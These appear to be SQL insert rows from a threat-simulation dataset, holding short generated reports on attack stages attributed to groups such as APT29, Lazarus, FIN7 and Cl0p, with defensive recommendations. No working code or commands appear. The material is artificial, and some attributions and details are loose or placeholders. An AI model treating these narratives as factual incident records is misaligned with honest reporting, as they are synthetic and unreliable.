(246, 48, 533, 4, 'Lateral Movement and Credential Dumping', '## Lateral Movement and Credential Dumping\n\n**Overview:**\nWith established persistence, the threat actors are moving laterally within the network, harvesting credentials to gain access to additional systems.\n\n**Key Findings:**\n- Use of legitimate tools like Mimikatz to dump credentials from memory.\n- Compromised accounts exhibit unusual login patterns and access attempts.\n- Network traffic analysis reveals attempts to authenticate across multiple systems.\n\n**Recommendations:**\n- Reset credentials for impacted accounts and enforce multi-factor authentication.\n- Deploy network segmentation to limit the spread of lateral movement.\n\n**Next Steps:**\nFocus on identifying and mitigating data exfiltration attempts as attackers access sensitive information.', '2026-01-06 02:36:36'),
(247, 48, 534, 5, 'Data Harvesting and Exfiltration', '## Data Harvesting and Exfiltration\n\n**Overview:**\nThreat actors are actively harvesting sensitive data from compromised systems, preparing for exfiltration to external servers.\n\n**Key Findings:**\n- Large volumes of data being compressed and staged for transfer.\n- Use of encrypted channels to conceal data movement from detection.\n- Targeted data includes intellectual property and user credentials.\n\n**Recommendations:**\n- Monitor outbound traffic for anomalies and block unauthorized data transfers.\n- Implement data loss prevention (DLP) solutions to identify and protect sensitive data.\n\n**Next Steps:**\nDetermine the specific targets based on MAC addresses to understand threat actor intentions.', '2026-01-06 02:36:36'),
(248, 48, 535, 6, 'Targeted MAC Address Identification', '## Targeted MAC Address Identification\n\n**Overview:**\nInvestigation reveals that threat actors are targeting systems with specific MAC addresses, indicating a highly selective attack strategy.\n\n**Key Findings:**\n- Analysis of compromised systems shows a pattern of MAC address targeting.\n- Threat actors appear to prioritize high-value targets within the network.\n- This targeted approach minimizes detection and maximizes impact on selected assets.\n\n**Recommendations:**\n- Identify and isolate systems with targeted MAC addresses to prevent further compromise.\n- Conduct a detailed audit of affected systems to understand the scope of the breach.\n\n**Next Steps:**\nExamine ongoing command and control communications to gain insight into threat actor objectives.', '2026-01-06 02:36:36'),
(249, 48, 536, 7, 'Command and Control Communication Analysis', '## Command and Control Communication Analysis\n\n**Overview:**\nThreat actors maintain command and control communications to coordinate their activities across compromised systems.\n\n**Key Findings:**\n- Use of custom C2 protocols to evade detection by standard network defenses.\n- Communication patterns indicate periodic updates and tasking from external servers.\n- C2 infrastructure is resilient, leveraging multiple domains and IPs for redundancy.\n\n**Recommendations:**\n- Block known C2 domains and IP addresses identified during the investigation.\n- Employ network intrusion detection systems (NIDS) to monitor for C2 communication patterns.\n\n**Next Steps:**\nInvestigate any anti-forensic techniques employed by threat actors to cover their tracks and hinder analysis.', '2026-01-06 02:36:36'),
(250, 48, 537, 8, 'Cleanup and Anti-Forensic Techniques', '## Cleanup and Anti-Forensic Techniques\n\n**Overview:**\nAfter completing their objectives, threat actors are employing anti-forensic techniques to erase evidence and hinder investigation efforts.\n\n**Key Findings:**\n- Use of secure delete utilities to remove traces of malware and logs.\n- Manipulation of timestamps and metadata to obscure activity timelines.\n- Disabling of logging and monitoring tools on compromised systems.\n\n**Recommendations:**\n- Recover deleted files using advanced forensic tools to piece together the attack timeline.\n- Strengthen logging and monitoring capabilities to detect future anti-forensic activities.\n\n**Conclusion:**\nConduct a post-incident review to enhance defenses and reduce the likelihood of similar attacks in the future.', '2026-01-06 02:36:36'),
(251, 49, 538, 1, 'Analysis of Suspicious Cloud Service Access Patterns', '### Overview\nFollowing the detection of suspicious cloud service access, further analysis has identified anomalous login patterns from IP addresses linked to known Inception APT activities.\n\n### Findings\n- **Unusual Login Times:** Access attempts were recorded during non-business hours, consistent with tactics used by Inception APT to remain undetected.\n- **Geolocation:** The IP addresses originate from regions with a known Inception APT presence, notably within Eastern European countries.\n- **Access Attempts:** Credentials appear to have been compromised, as multiple failed login attempts were observed before successful access.\n\n### Recommendations\n- **Immediate Response:** Enforce multi-factor authentication for all cloud service accounts.\n- **Monitoring:** Increase monitoring of access logs for unusual patterns, particularly IP addresses from suspicious regions.\n- **User Awareness Training:** Conduct a security awareness program focusing on phishing and credential security.', '2026-01-07 22:29:04'),
(252, 49, 539, 2, 'Detection and Mitigation of Cloud Atlas Malware Execution', '### Overview\nThe execution of the Cloud Atlas malware was confirmed, marking a critical phase in the attack lifecycle. The malware has been detected in the network environment of Eastern European diplomatic entities.\n\n### Technical Details\n- **Malware Characteristics:** The Cloud Atlas malware uses DLL side-loading techniques to evade detection by traditional antivirus solutions.\n- **Execution Path:** The malware was executed via a trojanized document file, likely delivered through spear-phishing emails targeting diplomatic personnel.\n- **Command and Control (C2):** Evidence of C2 communication attempts to external IP addresses associated with Inception APT infrastructure was identified.\n\n### Recommended Actions\n- **Containment:** Isolate affected systems immediately and conduct a thorough forensic analysis to determine the extent of the compromise.\n- **Malware Removal:** Deploy endpoint detection and response (EDR) tools specifically configured to detect and remove Cloud Atlas malware.\n- **Network Hardening:** Implement strict egress filtering to block unauthorized C2 communications and review firewall rules to prevent similar incidents.', '2026-01-07 22:29:04'),
(253, 49, 540, 3, NULL, NULL, '2026-01-07 22:29:04'),
(254, 50, 541, 1, 'Analysis of Initial Access: Unauthorized Entry', '### Unauthorized Access Detected\nAfter detecting initial unauthorized access to the systems, analysis reveals that attackers exploited a known vulnerability in the VPN software used by the target organization. This vulnerability allowed the attackers to bypass authentication mechanisms and gain entry into the network.\n\n#### Key Findings:\n- **Exploitation Method**: Use of a zero-day vulnerability in the VPN software.\n- **Tools Used**: Custom scripts to automate the exploitation process.\n- **Entry Point**: Compromised credentials were used in conjunction with the exploit.\n\n#### Next Steps:\nPrepare to monitor for any execution of malicious payloads as attackers establish foothold.', '2026-01-07 22:29:58'),
(255, 50, 542, 2, 'Decoding the Execution Phase: Malicious Payload Activation', '### Execution of Malicious Payload\nUpon unauthorized access, attackers proceeded to deploy a malicious payload designed to serve as an initial beacon back to their command and control (C2) servers.\n\n#### Key Findings:\n- **Payload Type**: Custom malware designed to evade detection by common antivirus solutions.\n- **Execution Method**: Utilizes PowerShell scripts embedded within legitimate software updates.\n- **Objective**: Ensure continued access and prepare for installation of a more permanent backdoor.\n\n#### Next Steps:\nFocus on identifying any backdoor mechanisms being established for persistence in the system.', '2026-01-07 22:29:58'),
(256, 50, 543, 3, 'Establishing Persistence: Backdoor Deployment', '### Establishing Backdoor for Persistence\nThe attackers have successfully deployed a backdoor within the target\'s network, ensuring their ability to maintain access over an extended period.\n\n#### Key Findings:\n- **Backdoor Type**: Custom-developed Trojan with rootkit capabilities.\n- **Persistence Mechanism**: Installation of services that auto-start with the system.\n- **Command and Control**: Encrypted communications with C2 servers to avoid detection.\n\n#### Next Steps:\nPrepare for potential lateral movement as attackers explore the network to identify valuable targets.', '2026-01-07 22:29:58'),
(257, 50, 544, 4, 'Stealthy Lateral Movement: Network Exploration', '### Stealthy Lateral Movement\nThe attackers have begun moving laterally within the network, utilizing compromised credentials obtained in earlier stages.\n\n#### Key Findings:\n- **Movement Techniques**: Use of compromised RDP sessions and pass-the-hash attacks.\n- **Target Exploration**: Scanning for sensitive data repositories and high-value systems.\n- **Evasion Tactics**: Use of legitimate administrative tools to mask activities.\n\n#### Next Steps:\nAnticipate and monitor for potential data exfiltration attempts as attackers aim to extract sensitive information.', '2026-01-07 22:29:58'),
(258, 50, 545, 5, NULL, NULL, '2026-01-07 22:29:58'),
(259, 51, 546, 1, 'Unauthorized Code Execution Detected: Analysis and Implications', '## Overview\nUpon receiving the alert for a suspicious email attachment, further investigation revealed unauthorized code execution on the target system. This suggests that the initial access was leveraged to deploy a malicious payload, likely part of the Equation Group\'s toolkit.\n\n## Technical Details\n- **Payload Analysis**: The attachment contained a heavily obfuscated script, which upon execution, triggered a series of PowerShell commands.\n- **MD5 Collisions**: The payload\'s hash matches known Equation Group signatures, indicating potential use of MD5 collision techniques to disguise malicious binaries.\n\n## Implications\nThe execution of this code marks the transition from initial access to active compromise, setting the stage for persistent foothold establishment.', '2026-01-07 22:33:18'),
(260, 51, 547, 2, 'Malware Persistence Mechanism Activated: Deep Dive', '## Overview\nFollowing the unauthorized code execution, a persistence mechanism was activated, ensuring the malware\'s continuity post-reboot.\n\n## Technical Details\n- **Registry Keys**: Modification of registry keys was detected, a common technique used by Equation Group to maintain persistence.\n- **Advanced Techniques**: The malware employs advanced tactics such as DLL injection and the creation of scheduled tasks.\n\n## Insights\nThis persistence ensures that even if the system is restarted or the initial payload is removed, the malware remains operational, allowing for continued espionage activities and data collection.', '2026-01-07 22:33:18'),
(261, 51, 548, 3, 'Lateral Movement: Anomalous Network Activity Analysis', '## Overview\nPost-persistence, anomalous network activity was detected, indicating lateral movement within the network, a hallmark of sophisticated cyber espionage operations.\n\n## Technical Details\n- **Credential Dumping**: Tools associated with the Equation Group were used to harvest credentials, facilitating movement between systems.\n- **Network Traffic Analysis**: Unusual patterns were observed, including SMB connections and RPC calls to multiple endpoints.\n\n## Implications\nThis lateral movement allows the attacker to expand their reach within the network, accessing additional resources and potentially compromising further systems.', '2026-01-07 22:33:18'),
(262, 51, 549, 4, 'Sensitive Data Exfiltration: Monitoring and Mitigation', '## Overview\nThe final stage observed was the exfiltration of sensitive data, a critical concern in espionage operations attributed to the Equation Group.\n\n## Technical Details\n- **Data Transfer Methods**: The exfiltration was conducted using encrypted channels, masking the data flow from standard monitoring tools.\n- **Targets Identified**: Files related to strategic communications and proprietary technologies were specifically targeted.\n\n## Recommendations\n- **Immediate Response**: Implement network segmentation and enhanced monitoring to mitigate further exfiltration.\n- **Long-term Strategy**: Develop and deploy advanced anomaly detection systems to identify potential threats earlier in the attack chain.', '2026-01-07 22:33:18'),
(263, 51, 550, 5, NULL, NULL, '2026-01-07 22:33:18'),
(264, 52, 551, 1, 'Analysis of Spear Phishing Attack Vector', '### Overview\nAfter detecting suspicious initial access via spear phishing, further analysis reveals that targeted emails contained malicious attachments designed to exploit vulnerabilities in email clients.\n\n### Key Details\n- **Targeted Industries:** Manufacturing and Energy sectors.\n- **Attachments:** Utilized a mix of macros and embedded scripts.\n- **Exploited Vulnerabilities:** CVE-2023-XXXX, affecting older email client versions.\n\n### Recommendations\n- Immediate update of email clients to patch known vulnerabilities.\n- Conduct user training on identifying phishing attempts.\n\n### Next Steps\nPrepare for potential malicious code execution as attackers aim to gain deeper system access.', '2026-01-07 22:35:14'),
(265, 52, 552, 2, 'Malicious Code Execution Analysis', '### Overview\nFollowing the execution of malicious code, system logs indicate the deployment of advanced payloads targeting industrial control systems.\n\n### Key Findings\n- **Payload Delivery:** Delivered through exploited email attachments.\n- **Target:** Focused on PLC firmware, aiming to disrupt operational processes.\n- **Observed Behavior:** Attempts to modify system configurations and interfere with normal operations.\n\n### Recommendations\n- Isolate affected machines to prevent further damage.\n- Implement network segmentation to limit exposure.\n\n### Next Steps\nFocus on rootkit persistence mechanisms that ensure continued attacker presence.', '2026-01-07 22:35:14'),
(266, 52, 553, 3, 'Rootkit Persistence Mechanism Identified', '### Overview\nThe rootkit deployed has established a robust persistence mechanism, enabling it to survive system reboots and evade standard detection.\n\n### Detailed Insights\n- **Persistence Techniques:** Utilizes bootkit components and modifies boot sectors.\n- **Evasion Tactics:** Employs anti-forensic techniques to avoid detection by security tools.\n- **Target Impact:** Continuous monitoring and disruption of PLC operations.\n\n### Recommendations\n- Conduct a thorough forensic analysis of boot sectors.\n- Employ specialized tools for rootkit detection and removal.\n\n### Next Steps\nMonitor for lateral movement as attackers attempt to expand their foothold.', '2026-01-07 22:35:14'),
(267, 52, 554, 4, 'Lateral Movement and Credential Dumping', '### Overview\nLateral movement detected suggests attackers are expanding their reach within the network by dumping credentials and leveraging compromised accounts.\n\n### Key Indicators\n- **Tools Used:** Mimikatz and custom scripts for credential extraction.\n- **Movement Patterns:** Transition from initial points of compromise to critical infrastructure nodes.\n- **Objective:** Gain control over additional systems and facilitate data exfiltration.\n\n### Recommendations\n- Reset compromised credentials immediately.\n- Deploy additional monitoring on critical systems to detect unauthorized access.\n\n### Next Steps\nPrepare to identify and mitigate data exfiltration attempts as attackers seek to extract sensitive information.', '2026-01-07 22:35:14'),
(268, 52, 555, 5, NULL, NULL, '2026-01-07 22:35:14'),
(269, 53, 556, 1, NULL, NULL, '2026-01-07 22:39:53'),
(270, 53, 557, 2, 'SUNBURST Backdoor Activation Analysis', '### Overview\nAfter initial access via the compromised SolarWinds update, the SUNBURST backdoor activates on the affected systems. This report delves into the mechanisms behind the activation.\n\n### Key Observations\n- **Activation Timing**: SUNBURST is designed to delay its execution to avoid raising immediate suspicion.\n- **Execution Methods**: Utilizes a combination of Windows processes to blend in with legitimate operations.\n\n### Recommendations\n- Conduct a thorough review of system logs during the initial days of compromise to identify unusual process behaviors.\n\n### Next Steps\nPrepare for potential persistence mechanisms adopted by SUNBURST to maintain foothold.', '2026-01-07 22:39:53'),
(271, 53, 558, 3, 'SUNBURST Persistence Mechanisms', '### Overview\nUpon activation, SUNBURST establishes persistence to ensure its continued presence on compromised systems.\n\n### Key Observations\n- **Registry Alterations**: Modifies registry keys to launch at startup.\n- **Scheduled Tasks**: Creates tasks that mimic valid system operations for periodic execution.\n\n### Recommendations\n- Audit registry changes and scheduled tasks for anomalies.\n\n### Next Steps\nInvestigate command and control (C2) communication methods utilized by SUNBURST.', '2026-01-07 22:39:53'),
(272, 53, 559, 4, 'C2 Communication via Domain Generation Algorithm', '### Overview\nSUNBURST employs a highly sophisticated domain generation algorithm (DGA) for its C2 communications, making detection challenging.\n\n### Key Observations\n- **Dynamic Domain Generation**: Regularly updates potential C2 domains, reducing the efficacy of static blocking.\n- **Encrypted Traffic**: Uses HTTPS for C2 communications to blend in with normal traffic.\n\n### Recommendations\n- Implement anomaly-based detection systems to flag unusual domain communications.\n\n### Next Steps\nFocus on identifying credential harvesting activities designed for lateral movement within the network.', '2026-01-07 22:39:53'),
(273, 53, 560, 5, 'Credential Harvesting and Lateral Movement', '### Overview\nWith a foothold established, APT29 utilizes SUNBURST to harvest credentials and facilitate lateral movement across networks.\n\n### Key Observations\n- **Credential Dumping Tools**: SUNBURST deploys tools to extract credentials from memory and secure storage.\n- **Lateral Movement Tactics**: Utilizes harvested credentials to access other systems, expanding its reach.\n\n### Recommendations\n- Monitor authentication logs for unusual access patterns and failed login attempts.\n\n### Next Steps\nPrepare for potential deployment of second-stage payloads following successful lateral movement.', '2026-01-07 22:39:53'),
(274, 53, 561, 6, 'Deployment of Second-Stage Payloads', '### Overview\nFollowing lateral movement, second-stage payloads are deployed to fulfill specific objectives of the operation.\n\n### Key Observations\n- **Payload Types**: Range from data collection tools to further exploitation utilities.\n- **Stealth Techniques**: Employs various methods to remain undetected, including fileless malware tactics.\n\n### Recommendations\n- Employ endpoint detection and response (EDR) solutions to identify and mitigate payload deployment.\n\n### Next Steps\nFocus on identifying data exfiltration methods utilized by the attackers.', '2026-01-07 22:39:53'),
(275, 53, 562, 7, 'Data Exfiltration via Stealth Channels', '### Overview\nAPT29 exfiltrates sensitive data using stealth channels to avoid detection.\n\n### Key Observations\n- **Stealth Channels**: Utilizes encrypted channels and legitimate services to mask data exfiltration.\n- **Data Types Targeted**: Includes intellectual property, sensitive communications, and credentials.\n\n### Recommendations\n- Implement data loss prevention (DLP) solutions to monitor and block unauthorized data transfers.\n\n### Next Steps\nInvestigate techniques used by APT29 to cover tracks and evade defenses.', '2026-01-07 22:39:53'),
(276, 53, 563, 8, 'Covering Tracks and Cleanup', '### Overview\nAs the operation concludes, APT29 employs various techniques to cover tracks and evade detection.\n\n### Key Observations\n- **Log Manipulation**: Alters or deletes logs to erase traces of their activities.\n- **File Removal**: Removes malware files and tools to prevent forensic analysis.\n\n### Recommendations\n- Regularly back up and secure logs offsite to prevent tampering.\n\n### Conclusion\nUnderstanding these techniques provides insight into APT29\'s strategies, aiding in future prevention and detection efforts.', '2026-01-07 22:39:53'),
(277, 54, 564, 1, 'Post-Phishing Attack Analysis', '### Context\nAfter the initial access was gained via a phishing attack, it\'s crucial to understand the tactics used by Lazarus Group to deliver the malicious payload.\n\n### Key Points\n- **Phishing Techniques**: The attackers utilized spear-phishing emails targeting specific employees at Sony Pictures.\n- **Email Content**: Emails included attachments or links leading to malicious sites.\n- **Employee Targets**: Employees with access to sensitive data were prioritized.\n\n### Next Steps\nPrepare for the possible deployment of malware, specifically the Destover malware, which is known to be used by Lazarus Group post-phishing.', '2026-01-07 22:40:38'),
(278, 54, 565, 2, 'Destover Malware Deployment Analysis', '### Context\nFollowing the phishing attack, Destover malware was executed within Sony Pictures\' network.\n\n### Key Points\n- **Malware Characteristics**: Destover is designed to wipe data and damage systems.\n- **Deployment Method**: Dropped via malicious email attachments or links.\n- **Initial Impact**: Systems were compromised, and data began to be wiped.\n\n### Next Steps\nPrepare for potential backdoor installations as attackers seek to establish persistence within the network.', '2026-01-07 22:40:38'),
(279, 54, 566, 3, 'Backdoor Installation and Persistence', '### Context\nWith the execution of the Destover malware, the attackers focus on maintaining access to the network.\n\n### Key Points\n- **Backdoor Tools**: Custom tools used by Lazarus Group to create persistent backdoors.\n- **Network Persistence**: Aim to maintain long-term access to the compromised systems.\n- **Detection and Evasion**: Techniques to evade detection by security systems.\n\n### Next Steps\nMonitor for signs of lateral movement as attackers map out the internal network.', '2026-01-07 22:40:38'),
(280, 54, 567, 4, 'Internal Network Reconnaissance', '### Context\nWith persistence established, the attackers began exploring the internal network of Sony Pictures.\n\n### Key Points\n- **Reconnaissance Tactics**: Use of legitimate credentials to move laterally.\n- **Target Identification**: Identification of high-value assets and data.\n- **Network Mapping**: Creation of a detailed map of the network\'s structure.\n\n### Next Steps\nFocus on identifying signs of data exfiltration activities, particularly through proxy chains.', '2026-01-07 22:40:38'),
(281, 54, 568, 5, 'Data Theft and Exfiltration Methods', '### Context\nAfter internal reconnaissance, the attackers initiated data exfiltration operations.\n\n### Key Points\n- **Exfiltration Techniques**: Data sent through encrypted channels and proxy chains to obfuscate origin.\n- **Target Data**: Intellectual property, confidential emails, and employee data.\n- **Stealth Tactics**: Use of legitimate network tools to blend with normal traffic.\n\n### Next Steps\nAnticipate attempts at log deletion to cover tracks and hinder forensic analysis.', '2026-01-07 22:40:38'),
(282, 54, 569, 6, 'Log Deletion and Evidence Destruction', '### Context\nAs data exfiltration concluded, the attackers shifted focus to destroying evidence.\n\n### Key Points\n- **Log Deletion**: System logs were systematically targeted and deleted.\n- **Forensic Challenges**: Hindered efforts to trace activities and attackers.\n- **Recovery Methods**: Possible methods to recover deleted logs for analysis.\n\n### Next Steps\nConduct a comprehensive analysis of the geopolitical motivations behind the attack, focusing on the interests of the Lazarus Group.', '2026-01-07 22:40:38'),
(283, 54, 570, 7, NULL, NULL, '2026-01-07 22:40:38'),
(284, 55, 571, 1, 'Report: Initial Access via HVAC Vendor Breach', '### Overview\nFollowing the compromise of the HVAC vendor\'s network, FIN7 leveraged stolen credentials to gain unauthorized access to the target retail system. This initial breach facilitated further infiltration into the target\'s infrastructure.\n\n### Key Findings\n- **Credential Theft**: FIN7 successfully harvested credentials from the HVAC vendor, exploiting weak security practices.\n- **Vulnerability Exploitation**: Existing vulnerabilities in the vendor\'s remote access protocols were manipulated to bypass security controls.\n\n### Next Steps\n- **Monitor for Malware Deployment**: With initial access achieved, anticipate the deployment of malicious software, specifically RAM-scraping malware, aimed at extracting sensitive data from Point-of-Sale (POS) systems.', '2026-01-08 22:01:14'),
(285, 55, 572, 2, 'Report: RAM-Scraping Malware Deployed', '### Overview\nFollowing initial access, FIN7 deployed RAM-scraping malware on the retailer\'s POS systems. This malware aims to capture unencrypted credit card data during transactions.\n\n### Key Findings\n- **Malware Characteristics**: The deployed malware is designed to scrape memory, extracting payment card information in real-time.\n- **Infection Vector**: POS systems were targeted via network access established through the compromised HVAC vendor credentials.\n\n### Next Steps\n- **Establishing Persistence**: It is critical to investigate methods used by FIN7 to maintain long-term access within the network, potentially through backdoors or additional malware components.', '2026-01-08 22:01:14'),
(286, 55, 573, 3, 'Report: Persistence Mechanisms Identified', '### Overview\nFIN7 has implemented various persistence mechanisms to ensure continued access to the retailer\'s network, complicating remediation efforts.\n\n### Key Findings\n- **Backdoor Installations**: Multiple backdoors have been identified, allowing FIN7 to regain access even after initial malware removal attempts.\n- **Scheduled Tasks and Services**: The attackers utilized scheduled tasks and modified system services to maintain their foothold.\n\n### Next Steps\n- **Lateral Movement Detection**: With persistence established, anticipate attempts to move laterally within the network, specifically towards the payment processing environments.', '2026-01-08 22:01:14'),
(287, 55, 574, 4, 'Report: Lateral Movement to Payment Network', '### Overview\nFIN7 successfully navigated laterally through the network, reaching the payment processing systems. This movement facilitated the exfiltration phase.\n\n### Key Findings\n- **Credential Reuse**: Previously compromised credentials were reused to access high-value systems.\n- **Network Mapping**: The attackers conducted extensive mapping of the internal network to identify critical assets.\n\n### Next Steps\n- **Data Exfiltration Monitoring**: With access to the payment network confirmed, focus on detecting and preventing the exfiltration of credit card information. Implement heightened monitoring of data flows leaving the network perimeter.', '2026-01-08 22:01:14'),
(288, 55, 575, 5, NULL, NULL, '2026-01-08 22:01:14'),
(289, 56, 576, 1, NULL, NULL, '2026-01-08 22:06:19'),
(290, 56, 577, 2, 'Initial Access Analysis', '## Analysis of Suspicious HTTP Request\nThe initial suspicious HTTP request detected was aimed at the Apache Struts framework. It appears to have exploited the CVE-2017-5638 vulnerability. This exploit allows remote attackers to execute arbitrary commands via a crafted Content-Type header. Further investigation is needed to confirm execution vectors leading to subsequent activities.', '2026-01-08 22:06:19'),
(291, 56, 578, 3, 'Execution Tactics Uncovered', '## Unusual Command Execution Observed\nFollowing the initial access, an unusual command was executed on the server. This command matches known patterns used to drop web shells, indicating a potential foothold has been established. Investigate server directories for anomalies in file modifications and check for unauthorized shell scripts.', '2026-01-08 22:06:19'),
(292, 56, 579, 4, 'Persistence Tactics Identified', '## Web Shell Detected in Server Directory\nA web shell has been detected on the server, placed in a directory accessible via HTTP requests. This suggests the attackers have established persistence, potentially allowing for remote command execution. Immediate containment is necessary to prevent further compromise.', '2026-01-08 22:06:19'),
(293, 56, 580, 5, 'Exfiltration Indicators', '## Unexpected Outbound Traffic Spike\nA significant spike in outbound traffic was observed, coinciding with the detection of the web shell. This traffic anomaly suggests potential data exfiltration. It is crucial to identify the data being accessed and determine the destination of the outbound traffic.', '2026-01-08 22:06:19'),
(294, 56, 581, 6, 'Lateral Movement Analysis', '## Unauthorized User Account Activity\nFollowing the exfiltration indicators, unauthorized activity was detected on multiple user accounts. This suggests attempts at lateral movement within the network. Review user account logs and network access patterns to identify the scope of compromise.', '2026-01-08 22:06:19'),
(295, 56, 582, 7, 'Reconnaissance Patterns Detected', '## Anomalous File Access Patterns\nAnomalous file access patterns have been detected, indicative of reconnaissance efforts. Files typically not accessed by routine processes are being queried, suggesting preparation for further exploitation. Conduct a thorough audit of access logs to identify unusual patterns.', '2026-01-08 22:06:19'),
(296, 56, 583, 8, 'Command and Control Channel Investigation', '## DNS Tunneling Suspected\nUnusual DNS queries have been observed, consistent with DNS tunneling techniques used for command and control communication. This covert channel allows attackers to bypass traditional security measures. Immediate action is needed to disrupt this communication chain.', '2026-01-08 22:06:19'),
(297, 56, 584, 9, 'Exfiltration Anomalies', '## Encrypted Traffic Anomaly\nAn anomaly in encrypted traffic was detected, potentially indicating advanced exfiltration methods. The use of non-standard encryption protocols points to sophisticated efforts to mask data transfer. Analyze traffic patterns and decryption attempts to ascertain data flow.', '2026-01-08 22:06:19'),
(298, 56, 585, 10, 'Privilege Escalation Attempts', '## Privileged Account Escalation Attempt\nAn attempt to escalate privileges on a compromised account has been detected. This attempt was thwarted, but it suggests a strategy to gain higher-level access within the network. Review all privileged accounts for signs of tampering or unauthorized access.', '2026-01-08 22:06:19'),
(299, 57, 586, 1, 'Post-Initial Access: Analyzing JNDI Payloads', '## Overview\nFollowing the detection of JNDI injection, further analysis is required to understand the payloads utilized by the attackers. These payloads often serve as the initial stage for further exploitation.\n\n## Key Findings\n- **Payload Variants:** Multiple JNDI payloads have been identified, indicating a sophisticated attack strategy.\n- **APT Attribution:** Evidence suggests the involvement of Chinese APT groups, leveraging customized payloads for deeper penetration.\n\n## Recommendations\n- **Immediate Patch Application:** Ensure all systems are updated with the latest security patches for Log4j vulnerabilities.\n- **Network Monitoring:** Increase monitoring of outbound connections to detect any unauthorized data flows.', '2026-01-08 22:09:13'),
(300, 57, 587, 2, 'Cryptominer Deployment: Identifying Malware Behavior', '## Overview\nThe deployment of cryptominers has been confirmed following the JNDI injection. This stage marks the transition from initial access to execution.\n\n## Key Findings\n- **Cryptominer Characteristics:** The malware is designed to utilize compromised systems for mining cryptocurrency, primarily focusing on Monero.\n- **Indicators of Compromise (IoCs):** Hash values and network traffic patterns associated with the cryptominer have been documented.\n\n## Recommendations\n- **System Resource Monitoring:** Watch for abnormal CPU usage, which may indicate cryptominer activity.\n- **Endpoint Detection and Response (EDR):** Deploy EDR solutions to detect and mitigate malware installations.', '2026-01-08 22:09:13'),
(301, 57, 588, 3, 'Backdoor Creation: Ensuring Persistence', '## Overview\nA backdoor has been identified, indicating the attackers\' intent to maintain long-term access to the compromised network.\n\n## Key Findings\n- **Backdoor Mechanisms:** The backdoor utilizes both known and custom methods to evade detection.\n- **Targeted Systems:** Persistence mechanisms have been established on critical infrastructure components.\n\n## Recommendations\n- **Comprehensive Threat Hunting:** Conduct thorough investigations to uncover hidden backdoors.\n- **Access Control Review:** Reassess access permissions and implement stricter access controls.', '2026-01-08 22:09:13'),
(302, 57, 589, 4, 'Lateral Movement: Expanding Network Foothold', '## Overview\nUnauthorized access has been detected, suggesting lateral movement within the network. This phase indicates an attempt to expand control and compromise additional systems.\n\n## Key Findings\n- **Techniques Used:** Attackers are leveraging stolen credentials and exploiting weak network segmentations.\n- **Potential Targets:** Systems holding sensitive data and high-value assets are at increased risk.\n\n## Recommendations\n- **Network Segmentation:** Strengthen network segmentation to limit lateral movements.\n- **User Behavior Analytics:** Implement solutions to detect anomalies in user behavior that may indicate credential misuse.', '2026-01-08 22:09:13'),
(303, 57, 590, 5, NULL, NULL, '2026-01-08 22:09:13'),
(304, 58, 591, 1, 'Insight into SQL Injection Vulnerability and Exploitation', '### Overview\nFollowing the initial alert on Cl0p\'s zero-day exploitation via SQL injection, it is crucial to understand the mechanisms and potential impacts of this attack vector.\n\n### SQL Injection Details\nSQL injection is a code injection technique that might destroy your database. It is one of the most common web hacking techniques. It can allow attackers to gain unauthorized access to sensitive data and even execute administrative operations on the database.\n\n### Potential Impacts\n- Unauthorized access to sensitive data.\n- Database corruption or deletion.\n- Network compromise and further exploitation.\n\n### Recommendations\n- Immediate patching of known vulnerabilities in the MOVEit system.\n- Enhanced monitoring of SQL queries and database access logs.', '2026-01-08 22:12:37'),
(305, 58, 592, 2, 'Automated Data Harvesting Scripts: A Deeper Look', '### Overview\nFollowing the execution of data harvesting scripts, it is important to analyze the methods and scripts used in this automated process.\n\n### Command and Scripting Interpreter: JavaScript (T1059.007)\nCl0p employs JavaScript-based scripts to automate the extraction and collection of data. These scripts can run with minimal detection and can be tailored to target specific datasets.\n\n### Key Characteristics\n- Scripts are designed to execute silently and efficiently.\n- They can be modified on-the-fly to avoid detection by security tools.\n- Typically exfiltrate data to external servers controlled by attackers.\n\n### Recommendations\n- Implement script execution monitoring.\n- Utilize behavioral analysis tools to identify unusual script activities.\n- Regularly update security policies to counter emerging threats.', '2026-01-08 22:12:37'),
(306, 58, 593, 3, 'Establishing Persistence: Techniques and Indicators', '### Overview\nPersistence mechanisms are crucial for attackers to maintain a foothold within compromised networks. Understanding these mechanisms can aid in detection and remediation.\n\n### Boot or Logon Autostart Execution (T1547)\nCl0p uses various techniques to ensure persistence, including modifying autostart entries and using scheduled tasks.\n\n### Indicators of Compromise\n- Unexpected changes in registry keys related to startup items.\n- New or modified scheduled tasks.\n- Unusual applications set to auto-start.\n\n### Recommendations\n- Conduct regular audits of startup and scheduled task configurations.\n- Implement endpoint detection and response (EDR) solutions to identify suspicious behavior.', '2026-01-08 22:12:37'),
(307, 58, 594, 4, 'Lateral Movement and Data Exfiltration: Strategies and Mitigation', '### Overview\nCl0p\'s lateral movement and data exfiltration strategies pose significant risks. Understanding these tactics can help in strengthening defenses.\n\n### Indicator Removal on Host (T1070)\nTo facilitate lateral movement, Cl0p employs techniques to hide their tracks by removing indicators of compromise.\n\n### Exfiltration Over C2 Channel (T1041)\nMass exfiltration is conducted over command and control (C2) channels, often using encrypted communication to avoid detection.\n\n### Mitigation Strategies\n- Deploy network segmentation to limit lateral movement.\n- Monitor for anomalous network traffic patterns.\n- Implement data loss prevention (DLP) solutions to detect and prevent unauthorized data transfers.', '2026-01-08 22:12:37'),
(308, 58, 595, 5, NULL, NULL, '2026-01-08 22:12:37'),
(309, 59, 596, 1, 'Initial Access Analysis', '## Overview\n\nFollowing the **Suspicious Access to Exchange Server** alert, further analysis was conducted to identify the initial access vector. It appears the adversary leveraged a known Exchange vulnerability, likely CVE-2021-34473, to gain unauthorized access.\n\n## Technical Details\n- **IP Address**: 192.168.1.10\n- **User Agent**: Suspicious pattern indicating automated tool usage\n- **Vulnerability Exploited**: CVE-2021-34473\n\n## Recommendations\n- Patch vulnerable Exchange servers immediately.\n- Implement network segmentation to limit access to critical assets.\n\n## Next Steps\nPrepare for potential web shell deployment as adversaries often use this method for further exploitation post-initial access.', '2026-01-08 22:15:20'),
(310, 59, 597, 2, 'Web Shell Deployment Insights', '## Overview\n\nPost detection of **Web Shell Deployment**, an investigation revealed the presence of multiple malicious web shells on the Exchange server.\n\n## Indicators of Compromise\n- **File Path**: `/owa/auth/xyz.aspx`\n- **File Size**: 3kb\n- **Behavior**: Command execution via PowerShell\n\n## Recommendations\n- Conduct a thorough scan for additional web shells.\n- Isolate the affected server to prevent further compromise.\n\n## Next Steps\nMonitor for privilege escalation attempts, particularly those exploiting CVE-2021-34523.', '2026-01-08 22:15:20'),
